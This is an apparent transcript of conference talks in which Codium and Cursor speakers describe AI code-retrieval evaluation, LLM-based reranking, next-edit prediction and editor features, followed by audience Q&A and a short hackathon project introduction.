It's the idea that you can sift through a corpus of text and find some instance of something that is relevant to you. Note, it is only one single needle. So in reality, code search requires multiple different needles, right? We showed that slide earlier, when you're building a contact form, you need all these different things in order to actually have a good generation.
And these benchmarks really don't touch that. So we decided to use a different metric, called recall at 50. Its definition is the fraction of your ground truth that is in the top 50 items retrieved. So the idea is that now we have multiple documents, and we're looking at the top 50 documents that we retrieved.
How many of those are part of our ground truth set? So this is really helpful for understanding document, multi-document context, especially again for those large, large code bases. And now we actually have to build a data set around this. And so this is where we did a little bit of magic.
We wanted to make the eval as close as possible to our end user distribution. So we had to compile our own data set. So what we did, this is a PR that I put out a few months ago, we looked at PRs like this. It's broken down into commits.
Those commits we can extract and actually match with the modified files, right? So now we have this mapping from something in English to a list of files that are relevant to that change. And you can imagine we can hash this in many different ways, but ultimately the point I'm trying to make is that we are creating an eval set that mimics the production usage of something like a code gen product.
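Given that mapping from a commit message to the files it modified, the metric itself is simple to compute. Here is a hedged sketch of scoring one such eval point; the commit message, file names, and retrieved list are invented for illustration.

```python
def recall_at_k(retrieved: list[str], ground_truth: set[str], k: int = 50) -> float:
    """Fraction of the ground-truth files that appear in the top-k retrieved items."""
    top_k = set(retrieved[:k])
    return len(top_k & ground_truth) / len(ground_truth) if ground_truth else 0.0

# One eval example built from a commit: message -> files it actually modified.
commit_message = "Add currency support to invoice sending"
modified_files = {"billing/invoice.py", "billing/tests/test_invoice.py", "docs/billing.md"}

# 'retrieved' would come from the retrieval system being evaluated, queried
# with the commit message.
retrieved = ["billing/invoice.py", "billing/currency.py", "docs/billing.md"]
print(recall_at_k(retrieved, modified_files, k=50))  # -> 0.666...
```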
And so these commit messages serve as the backing for this new type of eval, where now we can run, at scale, this idea of product-led benchmarks. It gets us closer to the ground truth of what our users are actually experiencing and what retrieval tweaks actually mean to the end product.
And so we threw some of the currently publicly available models at this notion of retrieval, this idea of using commit messages, and we found that there is reduced performance. They're unable to reason over specifically code, but then also specifically this kind of real-world notion of English and commits, right?
And so at Codeium, we've been able to actually break through the ceiling. This is something that we've worked very hard at. We had to redefine exactly how we approach retrieval in order to be in a class of our own, so that when you are typing in your IDE, when you're chatting with our assistant, when you're generating autocompletes, we're retrieving the things that are most relevant to your intent.
So now the question becomes, how do we actually get this kind of best-in-class retrieval? And so I'm here to give you the very short and sweet answer, which is we throw more compute at it, right? But of course, that can't come with absurd cost, right? Financial cost. So how do we actually do this in production?
How do we actually do this without recurring an unreasonable cost? And so this goes back to a little bit of Codium secret sauce, right? We are vertically integrated. And what this means is that we train our own models. So number one, we train our own models. This means that these are custom to our own workflows.
So when you're using our product, you're touching Codium's models. Number two, we build our own custom infrastructure. This is actually a very important point and connects to the whole ExaFunction-to-Codium pivot that we discussed earlier. ExaFunction was an ML infrastructure company. And so what we've been able to do is build our own custom infrastructure down to the metal.
This means that our speed and efficiency are unmatched by any other competitor on the market, so that we can serve more completions at a cheaper cost. And finally, we are product-driven, not research-driven. What this means is we look at things like actual end-user results. When we ship a feature, we're looking at real-world usage, and we're always thinking about how it impacts the end-user experience, not just some local benchmark tweaking.
And so we could spend all day talking about, you know, kind of why Codium has done this and yada-yada, but that's a talk for a different time. So I'm going to talk about something that I find very cool, and this is the reason why we've taken this vertical integration approach and been able to turn it into something that we call mQuery.
So mQuery is this way of taking your retrieval query. You have your code base, and let's just say you have N different items. And because we own our own infrastructure and train our own models, we're now making parallel calls to an LLM to actually reason over each one of those items.
We're not looking at vectors. We're not looking at a small-dimensional space. We're literally taking models and running them on each one of those items. You can imagine, you know, running ChatGPT and telling it to say yes or no on an item, for example.
That is going to give you the highest quality, highest-dimensional space of reasoning. This leads to very, very high-confidence ranking, into which we can then factor things like your active files, your neighboring directories, your most recent commits. You know, what is the ticket that you're working on currently?
We can compile all of this to give you, you know, the top N documents that are relevant for your generations, so that we can start streaming in higher quality generations, higher quality chat messages, things of that nature. And the reason behind this is, again, that vertical integration. It's that idea that our computation is 1/100 of the cost of the competitors'.
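To make the shape of that fan-out concrete, here is a minimal sketch of issuing one LLM relevance judgment per candidate item in parallel and keeping the top-ranked ones. The `llm_relevance` function is a stand-in (faked here with token overlap so the sketch runs end to end); it is not Codium's model, prompt, or serving stack.

```python
import asyncio

async def llm_relevance(query: str, snippet: str) -> float:
    """Stand-in for a call to a hosted LLM asked to judge relevance.

    A real system would prompt the model with the query and the snippet and
    parse a yes/no or scored answer; token overlap is used here only so the
    sketch is runnable."""
    q, s = set(query.lower().split()), set(snippet.lower().split())
    return len(q & s) / max(len(q), 1)

async def rerank(query: str, snippets: list[str], top_n: int = 20) -> list[str]:
    # One judgment per candidate, issued concurrently rather than one by one.
    scores = await asyncio.gather(*(llm_relevance(query, s) for s in snippets))
    ranked = sorted(zip(snippets, scores), key=lambda pair: pair[1], reverse=True)
    return [snippet for snippet, _ in ranked[:top_n]]

# Example: asyncio.run(rerank("alert dialog usage", ["<file A>", "<file B>"]))
```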
We are not using APIs. And as a result, our customers and our users actually get 100x the amount of compute that they would on another product. And so we're willing to do that. We're willing to spend more compute per user because it leads to a better experience. And so, like I mentioned earlier, I lead our product engineering team.
So we always want to anchor ourselves around these three different things. One, we have to build a performant product. It has to be really fast. For those of you that have used the product, you can probably attest to this. mQuery runs thousands of LLMs in parallel, so the user can start streaming in code within seconds, not minutes, not hours, seconds, and oftentimes milliseconds.
It has to be powerful. Right? None of this matters if the actual quality and the actual generations that you're building are wrong. Right? And finally, it has to be easy to use. We're building an end user product for people today that's in the IDE. Tomorrow, it might not be in the IDE.
How do we actually build something that is intuitive to understand, that people can grapple with and see exactly what the model is thinking? And so, because we have the benefit of distribution, we were able to roll this out to a small percentage of our users. And by small percentage, we're dealing in the order of, you know, a million-plus downloads.
This actually reached a surprising number of people. And what we've been able to see is that we were able to successfully reason over these thousands of files in people's monorepos, in people's remote repos, and select what was relevant. Right? We can very accurately determine which files are relevant for the generation that you're trying to have.
And the result, as you can see, this is a real-time GIF, is both fast and accurate. So I'm asking for usage of an alert dialog. It's going through, and I think I've panned down here. This is kind of a shadcn component that I've modified internally. We're pulling in basically the source code of what is relevant for our generation.
And ultimately, the results of this experiment were that users were happy. They had more thumbs up on chat messages. They were accepting more generations. And we were able to see that ultimately, we were writing more code for the user, which is the ultimate goal. It's that idea of how much value are we providing to our end users.
And so we built this context engine. Right? This idea of mQuery. This idea of ingesting context and deciding what is relevant to your query to give you coding superpowers. And so our users will generate today, they're generating autocompletes. They're generating chats, search messages. But in the future, they're going to generate documentation.
They're going to generate commit messages, code reviews, code scanning. They're going to take, you know, Figma artboards and convert them into UIs built with your own components. The possibilities are endless. But what it starts with is this bedrock, this very hard problem of retrieval. And it brings us to, again, one of the reasons why Codium is approaching this problem a little bit differently.
Our iteration cycle starts with product-driven data and eval. So we're starting with the end problem. We're building a product for millions of people. How do we start with what they're asking for? And how do we build a data set and eval system locally so that we can iterate on the metrics that matter?
Secondly, because we're vertically integrated, we're taking that massive amount of compute and we're going to throw it at our users. You know, paying or not paying, we're going to throw it at our users so that they can get the best product experience and the highest quality results. And then finally, we're actually going to be able to push this out to our users in real time, overnight, and be able to get a pulse check on how this is going.
You know, this is what we did for mQuery. And when we evaluate in production, we can say, you know, thumbs up, thumbs down, and then hit the drawing board again, back to that same cycle of repetition. And so you can start seeing how these pieces of compounding technology come together, right?
We've alluded to some of them today, modeling, infrastructure, being able to retrieve. But then it also includes things like AST parsing, indexing massive amounts of repos, knowledge graphs, parsing documentation, looking at websites online, the list can go on and on and on. But we're confident that we're solving these problems one piece at a time using that same iteration cycle, that same idea that we're going to take the distribution and knowledge that we have, and that additional compute that we're willing to afford each user to solve each one of these puzzle pieces.
And I want to leave you with a parallel analogy. So in my past life, I had experience in the autonomous driving industry. So to bring over a metaphor from that industry: in 2015, TechCrunch boldly predicted that that was going to be the year of the self-driving vehicle. That turned out to be largely untrue, right? Now we're in 2024, so we can look back in hindsight.
We were doing things like sensor fusion, we were decreasing our polling rates, we were running offboard models, all in an effort to make heuristics that would compensate for the lack of compute that was available, because consumer graphics cards were not as popular or as powerful as they are today.
Fast forward to today, and we're seeing 100x the amount of compute available to a vehicle. You can take a Waymo around San Francisco, which I encourage you to do, it's a wonderful experience. But that means that we're actually able to throw larger models at these problems, right? More sensors, higher frequency.
And now, in 2024, TechCrunch has released another article asking, will 2024 finally be the year of the self-driving vehicle? And we can look at this pattern and say: driving performance got substantially better by throwing larger models at the problem and being able to handle more and more data. And so at Codium, we believe that this embedding-based retrieval is the heuristic.
We should be planning for AI-first products, throwing large models at these problems, so that AI is a first-class citizen. We're planning for the future. And finally, we also believe that ideas are cheap. You know, I could sit up here and tell you all these different ideas about how we're going to transform coding and the theory behind possible solutions.
But what we believe at Codium is that actually shipping, actually showcasing this technology through a product, is the best way to go. And so if you agree with these beliefs, you can come join our team. We're based in San Francisco, and you can download our extension. It's free. Obviously, I'm not advertising the core product nearly as much here; we're mostly talking about the technology. But you can experience this technology firsthand today by downloading our extension. It's available across all the different plugins: VS Code, JetBrains, Vim, Emacs. And you can see how this infrastructure and the way we've approached product development have shaped the experience for you as a user.
And then, of course, you can reach out to me on Twitter. I put my handle up there. I'll be kind of floating around outside, so come find me if you have other questions or are interested in what I had to say. But I hope that you learned something today. I hope that, you know, you use Codium, you try it out, and see what the magic can do for yourself.
Thank you. Thank you so much, Kevin. And you guys can find Kevin outside the salon after the tracks have wrapped if you have any follow-up questions for him. Next, I'm very, very excited to bring up to the stage Michael Truel. He is the co-founder of Cursor and previously created Halite at Two Sigma, which is an artificial intelligence programming challenge back when he was an intern there.
And it still persists today inside Two Sigma. Cursor, as you guys may all know, is one of the most popular AI codegen tools out there right now. I can't count the number of Twitter mentions I see of the tool every single day. And on top of that, they count amongst their users, customers like Shopify, Samsung, OpenAI, Ramp, Replicate, the list goes on and on.
So very excited to be bringing up Michael to talk through this incredible product. Michael Truel: Can the audience hear me? Okay, amazing. Great to be here. I'm also here with Sualeh, my co-founder. Thanks for having us. We're going to talk through Cursor and give you a high-level sense of what we'd like to do over the next few years, and then do a little bit of a deep dive into some of what we've built so far.
And then, if there's time, we can take audience Q&A at the end. And so here on the first slide, this is to set up kind of the problem that we're nerd-sniped by, which is: what does programming look like in the age of AI? And to frame this, this is a little bit anachronistic, because no one really wrote x86 and they didn't do it in terminal.app.
But on the left here, sort of in the 1980s, before then, we had machine code. And then over the next many decades, humanity invented things like high-level programming languages and syntax highlighting and navigation features and links to make building software much easier. And this transformed developer productivity. And so over the next five to ten years, we think that level of a productivity jump is going to happen many times over in a much more compressed time frame.
And we're really nerd-sniped by this problem of what is the equivalent of a high-level programming language, what is the equivalent of all of this tooling around programming languages, in the AI age. And so just to frame the problem and talk a little bit about how some other folks are thinking through it, I think that, you know, in the popular discourse, there are kind of, by and large, two ways people are approaching the problem of how AI affects programming.
One is this kind of agent approach, which seems to advocate for, you know, programming kind of goes away, ceases to exist as kind of a high-level profession. Anyone can build software. And mostly, the way we build software will be through, you know, PRDs or chat messages that then get turned into code bases or big code changes.
And then on the other side of things, you know, there are folks who are building, you know, really useful plug-ins to existing coding environments and are kind of nipping at the edges of, you know, we can make ghost text autocomplete better. And we certainly can. And, you know, we can optimize the developer experience in little ways.
And to contrast this with how we're thinking through the problem, we think that programming is still going to exist in five years. It will still be a profession. Programmers will still be paid a lot of money. It will still be a technical discipline. But it's going to change a ton.
And it's not going to demand just a plug-in to an existing coding environment. It's going to demand an entirely new tool for doing software engineering. And so this focus on really pushing the ceiling of the amount of work the tool can take on while keeping the programmer in the driver's seat is our focus as a company.
And so to talk through a little bit, you know, what we've built so far. So, you know, our product is called Cursor. It's a code editor that's built for programming with AI. And our goal is to be the best tool for professional programmers to use AI. And so far, we've focused on two areas, mostly around code writing and Q&A.
And I want to talk through a couple of the pieces of things we've built in the code writing bucket. Because they also kind of illustrate why you would need a new dev environment for this and not just a plug-in to an existing coding environment. So one is we focused on predicting the next move of a programmer in a code base.
And this started with, you know, great work from folks at Copilot with ghost text autocomplete. And we took this idea to kind of the next level of, you know, if you're a programmer working within a code base, you're not always just typing characters after your cursor. Sometimes you're jumping to a completely new place.
Sometimes you're doing a diff. You know, you're deleting lines. You're inserting code in different places. And so we trained a model to predict your next edit within a code base and the next place you're going to jump to. And the result is an autocomplete system we called Copilot++ that can predict these things.
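As a toy illustration of what training examples for that kind of next-edit objective might look like (purely my own sketch, not Cursor's data pipeline), an ordered trajectory of edits can be turned into pairs of recent edits and the edit that followed them, including which file it landed in.

```python
from dataclasses import dataclass

@dataclass
class Edit:
    file: str
    diff: str   # one coherent change, e.g. a unified diff hunk

def next_edit_examples(trajectory: list[Edit], history: int = 3) -> list[dict]:
    """Turn an ordered sequence of edits (from a session or a commit series)
    into (recent edits -> next edit) training pairs: the model sees the last
    few edits and learns to predict the next one and where it lands."""
    examples = []
    for i in range(1, len(trajectory)):
        context = trajectory[max(0, i - history):i]
        examples.append({
            "prompt": "\n".join(f"--- {e.file}\n{e.diff}" for e in context),
            "target_file": trajectory[i].file,
            "target_diff": trajectory[i].diff,
        })
    return examples
```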
And kind of the second piece of the product I want to talk through is called Command K, which lets you go from instruction to code and select a part of the code base, ask for it to be changed, and then iterate with the AI on that block of code.
And so I can talk through some of the technical details of how we went about building each of these, both on the model side of things and also maybe on the editor side of things, too. Okay, so Copilot++. So it started off with, you know, when we first wrote our vision for what we wanted to do, the first line in there was like, oh, Copilot should do your next edit.
But over the next, like, couple of months, every time we would prototype something, it would include something like strikethroughs or it would move your cursor a ton when you were typing and that was super annoying. Or the model just wasn't accurate enough. Around October and November of last year, we had a couple of very interesting breakthroughs.
One of them was learning how to use the trajectories of programmers. So, you know, you go from one file to another file, using commit histories to learn how programmers do diff after diff after diff of these coherent edits, and then training a model to predict them. And combined with that, we had to come up with this side-by-side edit UX.
And the nice thing about that side-by-side UX is it's super easy to parse, but also it's not something that's super intrusive when you're typing. On the Command K end of things, the super interesting problem for us was how to make it both low friction, so if you have an instruction you want to type in a couple of characters, you can do it very quickly.
But also, just pull in context from across your repository or across your recent files so we don't make a mistake. We still are on the journey for making both of them even more accurate. And, you know, every couple of weeks we have either new model updates or new context updates.
You know, if you used Cursor, like, six months ago, I'd recommend trying it again. You'd find it both much faster and much more accurate. Yeah. And both of these pieces of code writing are just the beginning. In addition to what Sualeh said, we're always optimizing the background context building for these things.
We're optimizing the models. We're optimizing the UX in little ways. These, we think, are also the start of a journey when it comes to the final form factor for what programming looks like with AI. Two directions that we're especially excited about in the future, in addition to building off of these.
One is under the bucket of making programming feel like writing and reading pseudocode. And you're already seeing the write side of things here, where now the keystrokes people are typing in their code editor don't really correspond to Go and Rust and TypeScript. You know, people are writing things that are much more terse and kind of look a little bit like gibberish, and they're getting expanded into code by the diff-based autocomplete.
Or they're writing, you know, higher level instructions and they're getting turned into code changes by command K. And then on the read side of things, one thing we're experimenting with is, you know, are there times when it makes sense to trade off the formalism of a real programming language with concision?
And, you know, sometimes it might make sense to give the programmer kind of a slider that lets them control the level of abstraction of the code base that they're looking at and lets them look at something that looks a little bit more like pseudocode and lets them both read and use that for navigation and then also edit that and have the changes get made down at the source code by the AI.
And so this idea of still giving programmers control (both control over the level of abstraction, and the ability to gesture at specific instructions in a code base instead of stepping back and having to write something like a PRD, which is very divorced from the code) is an example of the idea space that we're really interested in.
And then another bucket that we're super interested in for the future is letting the AI do kind of constrained tasks in the background. Like I mentioned before, there's a lot of interest in agents having bots do things end-to-end, use tools, maybe go from a PRD to an entire code base or a big set of code changes.
We think that for professional programmers, for a long time, the tech's going to need to progress before we can really talk about end-to-end automation of PRs. And instead, in the meantime, the way that this technology is going to be deployed is you're going to really constrain what the AI can do, you know, write the interface for a method or a class and ask the AI to go implement that.
And then you can go use that method or class yourself. But, you know, give the AI more of a latency budget, you know, five minutes to go implement that stuff instead of the, you know, 10-15 seconds that are required if you're working with it in the loop. And have a constrained agent go and work on that code.
And already, you know, both here on the pseudocode side of things and especially on the constrained background agent side of things, we have internal experiments that look very promising. And so maybe to talk a little bit through some of the tech aspects of what's been required to build both Copilot++ and Command K, these next-action prediction and instruction-to-code features respectively, and then also the Q&A and chat and debugging features that we've built so far.
A lot of tech has been required to kind of do this vertically integrated, full-stack AI product. So as Sualeh mentioned, you know, we've done a lot of work on the next action prediction model that's powering Copilot++. The way that started was, you know, we started by trying out-of-the-box models on this idea of predicting the next action that a user is going to take in a code base.
And the problem was the models weren't that accurate. They were expensive and they were slow. And so we started with, you know, having small curated data sets and doing a parameter efficient fine-tune to, you know, take some of the out-of-the-box models and make them better at this objective. And then we went even further and we started to get the open source models to be, you know, good at this objective.
And now we have very small models that are very, very good at this next edit prediction objective. And we've also spent a bunch of time optimizing the inference for these models too, where, when you're rewriting code, one thing you waste time on is the unchanged parts of the code.
And so there are things you can do in the inference environment to kind of jump over those unchanged pieces. And then you want to talk through some of the other kind of technical points here? One of the things that we found really interesting was every time you would open up a code base for embeddings, for almost everyone, things would be super duper slow.
You know, if you opened up, you know, the SQLite repo, or if you opened up a much larger repo like LLVM, you would end up in a situation where LLVM would take hours and hours and hours to upload, which is just kind of unacceptable for us.
So we had to build a very performant, you know, file syncing engine that sort of syncs embeddings across the server. You know, it can generally do something like a thousand files over a few minutes. If you're like Instacart and have like hundreds of thousands of files, it will take like tens of minutes.
But it's not something that would take days. And when you do edits on that code base, our embeddings sync extremely quickly. And that means that your context is almost always very real time. And it's not going to be something where, you know, you check something out and it's like not updated for an hour or so.
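As a rough sketch of the general idea of incremental syncing (my own simplification, not Cursor's actual syncing engine), you could key each file by a content hash and only re-embed files whose hash changed since the last pass:

```python
import hashlib
from pathlib import Path
from typing import Callable

Index = dict[str, tuple[str, list[float]]]   # path -> (content hash, embedding)

def sync_embeddings(repo_root: str, index: Index,
                    embed: Callable[[str], list[float]]) -> Index:
    """Re-embed only files whose contents changed since the last sync.

    Unchanged files reuse their stored embedding and deleted files simply
    drop out of the new index, so an edit to a handful of files stays cheap
    even in a very large repo."""
    updated: Index = {}
    for path in Path(repo_root).rglob("*.py"):        # restrict to source files
        text = path.read_text(errors="ignore")
        digest = hashlib.sha256(text.encode()).hexdigest()
        key = str(path)
        if key in index and index[key][0] == digest:
            updated[key] = index[key]                  # unchanged: reuse embedding
        else:
            updated[key] = (digest, embed(text))       # changed or new: re-embed
    return updated
```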
The other thing we've done that I find most interesting is a lot of model caching tricks that rely both on the code editing features and on how the files sort of relate to each other. So in a general code base, a lot of the files have links that come from, you know, go-to-definition, links that come from a lot of the semantic features of a language.
And using that to actually build context has been something that's been super useful for us. Yeah, I guess I'll say one last thing about remote performance profiles, which is, you know, when you're building an editor, you're not only working on the AI side of things. We found it incredibly important to make Cursor really fast.
And, you know, that's something that the VS Code team works really hard on, but it's something we've sort of developed our muscle in as well. So if you, you know, hopefully come work for us, you won't only work on the AI side of things, but also on, you know, building a performant editor that ships to hundreds of thousands of people, which is just an interesting development problem in and of itself.
Yeah. And maybe just to wrap it up here, you know, as a shameless plug, we're always looking for brilliant people to join us. We're a really small, talented team, very in-person, based in San Francisco. And we're looking for both talented, creative people on the design and product side of things, and also people on the other end, on the research scientist side of things.
Because as mentioned, we're working on the full stack. We want to build the tool all the way down to the interface, figuring out what programming is going to look like there. And then also working backwards and building the most useful tech for people. And sometimes that requires using the biggest, smartest models.
Sometimes that requires using, you know, models that are really specialized to a particular task and are very fast and very cheap. And so, you know, to leave you with this: in the next five years, we really believe it will be possible to build a tool that automates almost all of software engineering as it looks today and transforms the discipline of programming into one where individual engineers can build systems that are much more complex than even entire engineering teams can build today.
And TBD whether we'll be the ones to execute on that opportunity, but it's one that really excites us. And, you know, we wake up every day passionate to try and solve it. So if you want to join us, the best way to reach us is at hiring@anysphere.inc. And thank you all for your time, and happy to take questions if we have extra time, too.
Mike Beck, thank you. Thanks so much, guys, for going through that. Yeah, we do have, I think, three minutes-ish left for Q&A. Oh, we have one already here in the front. Okay. I just want to, first off, thank you. It's probably been the most productive year writing code in my life in part, in large part, because of Cursor.
For folks who have started playing with it a little bit, maybe use the chat, you know, ask it to write things, paste it in the chat. What are some, like, more advanced techniques of using Cursor that you've discovered beyond the obvious of just, you know, moving code from the chat into the, or using command K, et cetera?
It's been really interesting seeing the different ways that people end up using the tool. Cursor is a pretty powerful and full-featured tool at this point, and there are lots of hidden features as you dig more and more into it. So, for instance, on the chat side of things, these models often output kind of shorthand code blocks with dot-dot-dots interspersed, and taking those code blocks and actually implementing them in your code base can be a bit tedious. So we have specialty models, for instance, that will apply those code blocks from chat.
I would say, of the two features we listed today and kind of dove deep into, the one a lot of people know about, but maybe fewer than, you know, the entire user base, is Command K. And so often that inline code editing is way more ergonomic than going to something like the chat and then, you know, having to apply changes from chat and going back and forth.
There are also some hidden debugging features, too. So, you know, if you get a stack trace in the terminal, we have this kind of a specialty loop to help you debug that. And if you run into really thorny linter errors, we have a way to, you know, to basically debug those, too.
You have to kind of hover over things to discover that. But by and large, right now, the most useful parts of the product are this, you know, next edit prediction with Copilot++, command K for writing code, and then chat for Q&A and asking questions about a code base. Any more questions?
I think we have time for one more. Maybe one and a half. Again, awesome work on the product. My question is, do you run, like, personalized models? I'm finding more and more that it feels like it knows what I want to do next. Hello. Oh, okay. My mic is enabled.
We've done a ton of work on the context building side of things. So it's not that models are being edited in the weights, per se, but we're using the in-context learning abilities of these models to find the parts of the code base that are most relevant to your task or query.
And that goes into both the next action prediction, next edit prediction side of things, where we're looking at your revision history. We're trying to figure out the next thing you're going to do. So if you're in the middle of a refactor, that model's really good at figuring out, hey, out of the last 200 lines you changed, what were the most important 15 that gives me a sense of your intent?
And ditto for, you know, chat and Command K. It's figuring out the parts of the code base, you know, the building blocks, that are most relevant for writing the code you wanted to write or answering the question that you have. For the future, one thing I'd like to comment on, sort of as a nerd snipe: there are two problems we're very interested in on the personalization end of things. One of them is, can we run some sort of, you know, agentic loop in the background that's building context for you while you're asking questions?
And then the second problem that we're really interested in: can we make a model learn your code base? Retrieval can start getting inaccurate on a really large code base, so if you have research ideas for actually learning a really large code base, we're super interested.
Awesome. Well, thank you so much, everyone, for your time today. We had some incredible speakers here. As mentioned, please do feel free to find them after the fact. Rahul said that he'll be over at the Microsoft booth in the Expo. Kevin will be around here, and I think the Cursor guys will be around here as well.
Um, thanks again for attending. Thank you.
Hey everyone, I'm Aditya Adwani, an AI engineer based in San Francisco.
Along with my teammates, I created Mathmatrix movies at a hackathon in SF on May 11th, 2024. Today, I'd like to show you what our project can do because I think it's really cool. What it does is that it generates really cool math explainer videos in a truly unique style that is able to get concepts across visually.
This is something that I think is really unique that you may never have seen before. So AI hackers, let's go.